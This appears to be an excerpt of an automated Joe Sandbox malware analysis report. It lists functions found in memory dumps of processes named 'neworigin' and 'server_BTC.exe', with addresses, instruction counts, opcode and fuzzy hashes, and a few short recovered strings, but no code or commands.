Instruction ID: 5c4d65f71fe43085f99efd33d9a887dc8c6a187dbf6c4904d8b1b70e64257591
Opcode Fuzzy Hash: e03f2611b632f500fdfaa166cec8eec8788d267f001746d10093b02f4f06368e
Instruction Fuzzy Hash: 55816D30B002098FDB85DFA9D4546AEB7F3BF88304F108528D50ADB395DB70DC468B92

Function 065746D8 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a6740d2edc6e5e05eb03bc39ed22ecda918827204b0e52bf4cacf1f2e6f6232
Instruction ID: 0cc0a8d58e46f00b224a97a69b0ec5a7d53ffcbe84a1c5c544404abffac03db4
Opcode Fuzzy Hash: 4a6740d2edc6e5e05eb03bc39ed22ecda918827204b0e52bf4cacf1f2e6f6232
Instruction Fuzzy Hash: 09913F34E106198FDF60DF68C890B9DB7B1FF89300F208599D549BB255DB70AA86CF91

Function 065746F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a269aa4697012f743e5690f08a9306c51f3e588638ecdcf8684b151cf26279
Instruction ID: d521556951b0c6e2d191f711b8d05330fbb82e2bfb6306fb4846a6c0163e7f9e
Opcode Fuzzy Hash: 43a269aa4697012f743e5690f08a9306c51f3e588638ecdcf8684b151cf26279
Instruction Fuzzy Hash: 69913D34E106198BDF60DF68C890B9DB7B1FF89300F208599D54DBB255EB70AA86CF91

Function 0657EC48 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c5b849d8df73fe5c5f24c22d2693eb1e85e2afd7815a7e693b2f2ffd89ffb7
Instruction ID: 024ca76ddd1fa31f54fa3a88ba595d39dd0166230fcd28b46a34ea973f6d0eb3
Opcode Fuzzy Hash: f6c5b849d8df73fe5c5f24c22d2693eb1e85e2afd7815a7e693b2f2ffd89ffb7
Instruction Fuzzy Hash: AD714E34A002099FDB54DFA9D991AAEBBF6FF84300F148869E405EB355DB30ED46CB50

Function 0657EC38 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7027471a364caef740264beaef09b89357f959d4870c1160606609ab66f9600
Instruction ID: 7726408a4a942da459f6c79062085b49a56f2510f720e3fec7990eadb86be4ed
Opcode Fuzzy Hash: c7027471a364caef740264beaef09b89357f959d4870c1160606609ab66f9600
Instruction Fuzzy Hash: 3B713B74A002099FCB54DFA8D991AADBBF6FF88300F158969D419EB365DB30ED46CB40

Function 0657FB58 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e14abbf6e431757ca93f8097601d12092ff93e627c0d9d34558a13833b79ed0
Instruction ID: 5b96addf194c6ecdc11e62079e9603edb11bb84ace4d61093ddc3d414761ddc9
Opcode Fuzzy Hash: 3e14abbf6e431757ca93f8097601d12092ff93e627c0d9d34558a13833b79ed0
Instruction Fuzzy Hash: 8E51ED70B142149FEF74A66CF95477F265EEB89300F104926E80EDB3D5CA6CCC4587A2

Function 0657FB68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabdab233bdd53e4f7af62c7209ec3e2cee0afa2ae1cc76290598a20034c4fe2
Instruction ID: eebc40bba4451f9eef5bba4df7dd06dfcf7743494205d43fb0c6b0cbf3fc8a50
Opcode Fuzzy Hash: fabdab233bdd53e4f7af62c7209ec3e2cee0afa2ae1cc76290598a20034c4fe2
Instruction Fuzzy Hash: EA51EB70B102048FEF74A66DF95472F265EE789350F204929D80EDB3D9CA68CC458BA2

Function 06575531 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab230f917916a4b6c5fd1b4e2a96545cb1de18624ecae3d6d628c347d206a804
Instruction ID: de7ebc43b6bee7371d5cc207a687bdf21b4724851a3b220649ba75c88e1149a2
Opcode Fuzzy Hash: ab230f917916a4b6c5fd1b4e2a96545cb1de18624ecae3d6d628c347d206a804
Instruction Fuzzy Hash: 6F414271E006058FDF60CEA9E8C0AAFF7F2FB84310F10492AD556D7650EB35E9598B91

Function 06572088 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f883b33039a69f99a7ce0ffc9a5890586d6ec143f5898fb6727c11a834d5f73
Instruction ID: fdce0207a6a422e136bde7a86e2960710362cdbe0e2dfd19b23b2baa8a29c464
Opcode Fuzzy Hash: 0f883b33039a69f99a7ce0ffc9a5890586d6ec143f5898fb6727c11a834d5f73
Instruction Fuzzy Hash: BE315030E1020A9BCB59DF64D85469FB7B2FF89300F108529E906EB350DBB1A946CF51

Function 06572098 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 529e5255c3337a165f3243059baa74fcd7d07d628619e398bce890cc4b916b4f
Instruction ID: b122c3c4fbb9ded47270b1dd1b50a8941c64eeb44f383095c1cf5c35dc023c53
Opcode Fuzzy Hash: 529e5255c3337a165f3243059baa74fcd7d07d628619e398bce890cc4b916b4f
Instruction Fuzzy Hash: F6317030E102099BCB59CFA5D85469EB7B6FF89300F10C929E906EB350DBB1AE46CF51

Function 06573BB9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52daa5e5cff5930dab2bb5b1dfdf31018bb8a6e248ad241c2e3cc2641e5f8c92
Instruction ID: 907f5408e563259c012474d75c78ee48bce59d55d152b5739eaa3e1d348650dd
Opcode Fuzzy Hash: 52daa5e5cff5930dab2bb5b1dfdf31018bb8a6e248ad241c2e3cc2641e5f8c92
Instruction Fuzzy Hash: CE21BA75E01215AFDB50EF68E881AEEBBF5BB48710F108029E909EB390E731D951CB91

Function 06573BC8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62f232b959862d639a31fb7045933fa646a4f20257d7aabc528f28ff2efa30a
Instruction ID: 6204df312008a39e7168c65780dca6b58efc44a45cf88a95338055a6382ac86e
Opcode Fuzzy Hash: b62f232b959862d639a31fb7045933fa646a4f20257d7aabc528f28ff2efa30a
Instruction Fuzzy Hash: 2121AE75F012159FDB50DF68E881AAEB7F5FB48310F104029E909EB340E731D941CB91

Function 0657FA80 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13ea86ff67078bf99b48a1ff6d4667b575a64fbd8d7b61d0410174487096e46
Instruction ID: d28e742e219b2294dff4b622c2b2c6010ee311690edbcd9d0a6628db9ce34506
Opcode Fuzzy Hash: f13ea86ff67078bf99b48a1ff6d4667b575a64fbd8d7b61d0410174487096e46
Instruction Fuzzy Hash: C0112660B102141BEF64A17DED54B3F168EDB86750F20482AF80EDB396C818CD4A43E6

Function 0657FA90 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e88331859a5efb87228b376dae944162e436829f15d826e611efc79505c17d14
Instruction ID: 210c6bafee8f926518fb39560891697e310ca266bd97636b3bf1aa2182106d24
Opcode Fuzzy Hash: e88331859a5efb87228b376dae944162e436829f15d826e611efc79505c17d14
Instruction Fuzzy Hash: 9A01D460B202145BEF64A1BDF95573F118EEBC5750F20483AE90ED7795CC58CC4647D6

Function 0657431A Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deaba53e670f3e1bfdfacdd367269725d507305260ad0d8904cb565552a1188c
Instruction ID: ebbcb2ac4c14401c86349bf8a01f8f9f6edf647afb40acf33b4f3580e35d836a
Opcode Fuzzy Hash: deaba53e670f3e1bfdfacdd367269725d507305260ad0d8904cb565552a1188c
Instruction Fuzzy Hash: 6801F534B041500FDB65867DA804B1FBBDADBC6710F15843AF10DCB351DD64DC4687A1

Function 06573CD8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680b6d574e9eaff4c4f999a391f99413f043e4fa8e9e6109f2108cb37885cd75
Instruction ID: 6022bce0e75d7d809811ab3e29c837f3b7157307d0e55b5faacff42f9d9c23fd
Opcode Fuzzy Hash: 680b6d574e9eaff4c4f999a391f99413f043e4fa8e9e6109f2108cb37885cd75
Instruction Fuzzy Hash: 0711AD32B001299FDB94A668D8146AE73EAFBC8621F004539C90AEB344DF65DC028BD1

Function 0657EEB9 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2109e5d4a4e4fbcef1d02eb6969e94c0c3bc458065336150501582e80e97d99
Instruction ID: f36a4770d391e0f71e863acc220d361de97d4f693b9638d2c29d749e9b83e287
Opcode Fuzzy Hash: c2109e5d4a4e4fbcef1d02eb6969e94c0c3bc458065336150501582e80e97d99
Instruction Fuzzy Hash: AE012831B002154FCB66DABDE855F2BBBD6DBCA714F158869E109CB391DE20DC0687D1

Function 06573990 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 392491a901b4cefbd22dfddd77abc5fbcccf39aad17ce93d3f8e65700174532f
Instruction ID: 03ed96673be129e4c72fdbd11d041130300d6bd3a297bcbefb0b0b845dacea6c
Opcode Fuzzy Hash: 392491a901b4cefbd22dfddd77abc5fbcccf39aad17ce93d3f8e65700174532f
Instruction Fuzzy Hash: 2621E2B5801259AFCB10CF9AD885ADEFBB4FF49310F10812AE918A7640C374A550CBA5

Function 0657A409 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52f6b5d1ab449141f68d3374659ea2545dabfd8661e15a9cfade1c078d5c7e2d
Instruction ID: 87c28e35327324121c5b7fadd07daebb8b72425e316b2d9a249816351fac775c
Opcode Fuzzy Hash: 52f6b5d1ab449141f68d3374659ea2545dabfd8661e15a9cfade1c078d5c7e2d
Instruction Fuzzy Hash: AB012835B042100FCBA2AA38F818B5F7BD6EFC6714F004839E54ACB391DE12EC468791

Function 06573CC7 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7ae44e2609e13d10e6593b32b7430f1d9c6d95566cea64ae7a7bd3a75341e8
Instruction ID: cc7ce91a0fdf19929f5b3b1f97c97d96d76549533ecd53b51e087495713c45be
Opcode Fuzzy Hash: 8f7ae44e2609e13d10e6593b32b7430f1d9c6d95566cea64ae7a7bd3a75341e8
Instruction Fuzzy Hash: 0401D432B100255BDB949669EC157EF76AFEBC8610F000039D90AEB284EE65CC028BE2

Function 06573998 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c13db03bea64294881276a32508c16f28a4fae3df94829d2828a75e315913b85
Instruction ID: 8f892b1e4724135c2a053dcbae5c00e9fb5dcc80099be4e574af9d40aa44313b
Opcode Fuzzy Hash: c13db03bea64294881276a32508c16f28a4fae3df94829d2828a75e315913b85
Instruction Fuzzy Hash: 4811D3B5D012599FCB00DF9AD884ADEFBF4FB49310F10812AE518A7200C3746544CFA5

Function 06574328 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5af19c9566a8e7f4955605ec1a72f2aedc2b9edce447e3049631c6956a48479
Instruction ID: 6cf2e0c938bd9732e0587f866983cf8d2d07d898191be8239e7969db1c26df94
Opcode Fuzzy Hash: c5af19c9566a8e7f4955605ec1a72f2aedc2b9edce447e3049631c6956a48479
Instruction Fuzzy Hash: 4D01D135B000240BDB65957DE404B2FA3DBDBCA711F20883AE60ECB394DDA5DC424791

Function 0657EEC8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8accd1ca53375060acc630173420f9780b65ade5d2629a8bd7e32afd96e48e
Instruction ID: ebbee504bcf090d49336016dc09c74a2ba0a9239d66e7531628742930e03193a
Opcode Fuzzy Hash: fc8accd1ca53375060acc630173420f9780b65ade5d2629a8bd7e32afd96e48e
Instruction Fuzzy Hash: 6B01FF31B002150BCBA59ABDF451B2FA7CAEBCA725F108839F60ACB340DE65DC024B81

Function 0657A418 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8a653ecb26d8b145e78be2d9fb2eb2bc644942edda641dc6c8dfb67e2ba58f3
Instruction ID: 42ecb1028e40f1b328833ccba922d9fb7936a0e31d5d695eb845521df8876fea
Opcode Fuzzy Hash: a8a653ecb26d8b145e78be2d9fb2eb2bc644942edda641dc6c8dfb67e2ba58f3
Instruction Fuzzy Hash: 7B018135B001140BDBA1EA7CE458B2E73D6EBC5715F108838E60ACB394EE22EC468B81

Function 06576569 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0326519f2cb9adf9eb59f555a3f4cbca0e7bed448751cb777bccdc24481e881a
Instruction ID: efb6f7036c84bf8257b6f3a5213352bc3219d69be5f77892fcf8ae65ce1a8ff2
Opcode Fuzzy Hash: 0326519f2cb9adf9eb59f555a3f4cbca0e7bed448751cb777bccdc24481e881a
Instruction Fuzzy Hash: E3E09270D256886BDF60CBB1E90D74B7FADEB42214FA048E5E408CB146E176D901DB91

Non-executed Functions

Function 06577798 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$]q, xrefs: 065778EE
$]q, xrefs: 06577D23
$]q, xrefs: 065778B1
$]q, xrefs: 06577C7A
$]q, xrefs: 06577D2F
$]q, xrefs: 065778E2
$]q, xrefs: 06577D19
$]q, xrefs: 06577D0D
$]q, xrefs: 065778BD
$]q, xrefs: 06577C6E

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2843079600
Opcode ID: fdc477a8f9db52563586e329d8bbdde843dc4deebb5d026ef2afbefeb75831ad
Instruction ID: 6611939f1bbe9778f6f78fcf21f8aeab95adc62186a4633d3c9fe230f7d288d9
Opcode Fuzzy Hash: fdc477a8f9db52563586e329d8bbdde843dc4deebb5d026ef2afbefeb75831ad
Instruction Fuzzy Hash: F9123E30E012198FDB68DF79E894AADB7F6BF88304F208969D509AB355DB309D45CF80

Function 0657AA38 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$]q, xrefs: 0657ABC0
$]q, xrefs: 0657ABF6
$]q, xrefs: 0657AB2E
$]q, xrefs: 0657AB3A
$]q, xrefs: 0657AB89
$]q, xrefs: 0657AB95
$]q, xrefs: 0657ABB4
$]q, xrefs: 0657ABEA

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: b370373f6e3a4b309ee8f9d42d37731c0d9019aa42a3d082210d1dff7ac56daa
Instruction ID: fc9915a4b6a09d2dd0b7f4c214088a4e232c7e2e4d2a14e7f71c622004c17696
Opcode Fuzzy Hash: b370373f6e3a4b309ee8f9d42d37731c0d9019aa42a3d082210d1dff7ac56daa
Instruction Fuzzy Hash: 72918230A00209DFEB68EF65E995B6E77F6FF84301F108829E805AB295DB749D45CF90

Function 06577198 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$]q, xrefs: 06577634
$]q, xrefs: 065776A0
$]q, xrefs: 065774D4
.5uq, xrefs: 065771F3
$]q, xrefs: 065776AC
$]q, xrefs: 0657747A
$]q, xrefs: 065774E0

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: 47a784116ee8e97755a9bf51886d8c8d0283460c7243dbc9ba3abb55386d04b3
Instruction ID: b2510b8b38c9d5fdf32352e7ffefa35aa374205127bc42eddb8b0a9dfa50f309
Opcode Fuzzy Hash: 47a784116ee8e97755a9bf51886d8c8d0283460c7243dbc9ba3abb55386d04b3
Instruction Fuzzy Hash: 26F14F30B01209CFDB58EF64E594A6EB7F6FF88300F248468D405AB3A9DB349D46CB91

Function 065784D0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$]q, xrefs: 0657872A
$]q, xrefs: 0657879B
$]q, xrefs: 06578736
$]q, xrefs: 0657878F

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 1e455086d13a033eb8c6c2a99df0ec1f57b744fed4dbdbec14693c543c866ef8
Instruction ID: 22881d5d2474388c8d1d11097c2da3f6249b5f3f509ea0a12e201dea2c425575
Opcode Fuzzy Hash: 1e455086d13a033eb8c6c2a99df0ec1f57b744fed4dbdbec14693c543c866ef8
Instruction Fuzzy Hash: B2B13D30A012098FDB54EF69E598A6EB7F6BF84304F248839D406AB355DB75DC86CB81

Function 065788E8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR]q, xrefs: 065789DB
LR]q, xrefs: 06578A2A
$]q, xrefs: 06578967
$]q, xrefs: 06578973

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: 8b8c7bedcc47f024cf2257632e88b03a6132d13c81b7787b02f63524eb729970
Instruction ID: 1676a386c43e9912c6d29a193c7cc2eaa00868c0386fd904bd4559e30a09bc79
Opcode Fuzzy Hash: 8b8c7bedcc47f024cf2257632e88b03a6132d13c81b7787b02f63524eb729970
Instruction Fuzzy Hash: 5751B3307002059FDB58EF68E888A6AB7F5FF84710F148968E5069F3A9DB70EC45CB51

Function 0657ADC0 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

$]q, xrefs: 0657AEF1
$]q, xrefs: 0657AF9C
$]q, xrefs: 0657AF73
$]q, xrefs: 0657AF44

Memory Dump Source

Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 91ea312675720aa09419a5d7d34b878998dd2411dc01585f16ef1880d3b02689
Instruction ID: 5991ba1ab60bac3afdd3736f7b3034e9a96a42e7895b3b3b324cbbc9e00dccbb
Opcode Fuzzy Hash: 91ea312675720aa09419a5d7d34b878998dd2411dc01585f16ef1880d3b02689
Instruction Fuzzy Hash: D4517174A112099FDF65EB68E580AAEB7B6FF84310F108929E805EB355DB30DC41CF91

Analysis Process: server_BTC.exePID: 2820, Parent PID: 1120COMMON

Executed Functions

Function 01217643 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c987ed4c6d3ce043db0004a9032293e66d3041403a0b2f1dcd9ba70a11f1966
Instruction ID: 8c20a3a3ac1e2aa6100099325bb8aeb3ec66c821d10954002c3e03408933b9f3
Opcode Fuzzy Hash: 3c987ed4c6d3ce043db0004a9032293e66d3041403a0b2f1dcd9ba70a11f1966
Instruction Fuzzy Hash: F0710270D01219CFCB15EFA4D844AADBBB2FF99304F208569D409BB368DB35698ACF54

Function 01217688 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6ce2ea441b09d953c48098825da7fe3aa0d76a9e3384b73ac03318727c02ba8
Instruction ID: fbecff527bf96f9fce247738823627946aae21a307a2527afba4491bdb6893ca
Opcode Fuzzy Hash: c6ce2ea441b09d953c48098825da7fe3aa0d76a9e3384b73ac03318727c02ba8
Instruction Fuzzy Hash: CF61D070D01219CFCB14EFA4D990AADBBB2FF99304F208569D4097B368DB35694ACF40

Function 01217188 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 239440acf48d340a8e92c9a90971f2793d4689f0285917822d79f08889de8fb6
Instruction ID: 6382af46f3d967f5c319ad53fa7f1d703cc364616e286282c99fe6cb7ff797e1
Opcode Fuzzy Hash: 239440acf48d340a8e92c9a90971f2793d4689f0285917822d79f08889de8fb6
Instruction Fuzzy Hash: 7361C278A50208CFCB44DFA8D59499DBBF2BF49310F109069E909AB369DB31AC45CF54

Function 01217E58 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e281eabcdf46897eae3fb7d664d90dd439ad377186be3b0e820797a03208af
Instruction ID: 7890034271822c3e03d4b2b009f1317860ba726101b7a36e9f23f3d133be12d9
Opcode Fuzzy Hash: b4e281eabcdf46897eae3fb7d664d90dd439ad377186be3b0e820797a03208af
Instruction Fuzzy Hash: 3541CCB0D002489FDB14DFEAD984AAEFFF6BF99300F24842AE409AB254D7349945CF54

Function 01217E60 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2234060582.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1210000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef45090b6d5f32e19e03800620354739baa9b749123566bc53cb878f654f041
Instruction ID: a744d02b4837c9fd6a4526cdde650f43d420210ed748126225cee611a9dbdc08
Opcode Fuzzy Hash: 9ef45090b6d5f32e19e03800620354739baa9b749123566bc53cb878f654f041
Instruction Fuzzy Hash: F641CCB0D002489FDB14DFEAC984A9EFFF6BF99300F24802AE409AB254D7349945CF54

Function 012174F3 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

Jdq, xrefs: 01217611

Memory Dump Source

